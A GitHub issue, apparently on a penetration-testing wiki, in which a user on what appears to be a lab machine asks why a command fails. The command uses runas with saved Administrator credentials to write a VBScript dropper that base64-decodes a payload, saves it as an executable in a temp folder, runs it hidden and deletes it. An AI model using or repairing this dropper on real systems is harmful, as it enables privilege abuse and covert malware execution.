pentest-wiki icon indicating copy to clipboard operation
pentest-wiki copied to clipboard

Published 20 hours ago verified publisher icon nixawk

Trying to generate the vbs payload in telnet but failing

Open CustosClarus opened this issue 1 year ago • 0 comments

I'm on telnet server and using runas I'm interacting with the admin shell (cmd.exe) with this command `

C:\Windows\System32\runas.exe /user:ACCESS\Administrator /savecred "C:\Windows\System32\cmd.exe /c echo shellcode = WScript.Arguments.Item(0):strXML = ^"^^" ^& shellcode ^& ^"^<^/B64DECODE^>^":Set oXMLDoc = CreateObject(^"MSXML2.DOMDocument.3.0^"):oXMLDoc.LoadXML(strXML):decode = oXMLDoc.selectsinglenode(^"B64DECODE^").nodeTypedValue:set oXMLDoc = nothing:Dim fso:Set fso = CreateObject(^"Scripting.FileSystemObject^"):Dim tempdir:Dim basedir:Set tempdir = fso.GetSpecialFolder(2):basedir = tempdir ^& ^"^" ^& fso.GetTempName():fso.CreateFolder(basedir):tempexe = basedir ^& ^"^" ^& ^"test.exe^":Dim adodbstream:Set adodbstream = CreateObject(^"ADODB.Stream^"):adodbstream.Type = 1:adodbstream.Open:adodbstream.Write decode:adodbstream.SaveToFile tempexe, 2:Dim wshell:Set wshell = CreateObject(^"Wscript.Shell^"):wshell.run tempexe, 0, true:fso.DeleteFile(tempexe):fso.DeleteFolder(basedir) > C:\Users\Security\msf2.vbs"`

this is creating an empty vbs file I have tested with normal files it works, I believe its the escape characters which is breaking the command, please suggest what can i do in this context thank you

CustosClarus avatar Nov 01 '23 17:11 CustosClarus